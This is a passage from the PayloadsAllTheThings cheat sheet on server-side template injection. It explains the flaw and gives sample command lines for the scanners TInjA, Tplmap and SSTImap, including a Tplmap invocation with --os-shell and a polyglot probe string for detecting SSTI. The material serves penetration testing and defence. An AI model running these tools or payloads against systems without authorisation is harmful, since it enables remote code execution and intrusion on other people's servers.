PayloadsAllTheThings/Server Side Template Injection/README.md
2024-10-23 13:59:18 +02:00

5.9 KiB
Raw Blame History

Server Side Template Injection

Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Summary

Tools

  • TInjA - An effiecient SSTI + CSTI scanner which utilizes novel polyglots

    tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
    tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
    
  • Tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool

    python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
    python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
    python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
    
  • SSTImap - Automatic SSTI detection tool with interactive interface based on Tplmap

    python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
    python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
    python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
    

Methodology

SSTI cheatsheet workflow

Detection

In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability :

${{<%[%'"}}%\.

The Template Injection Table is an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.

References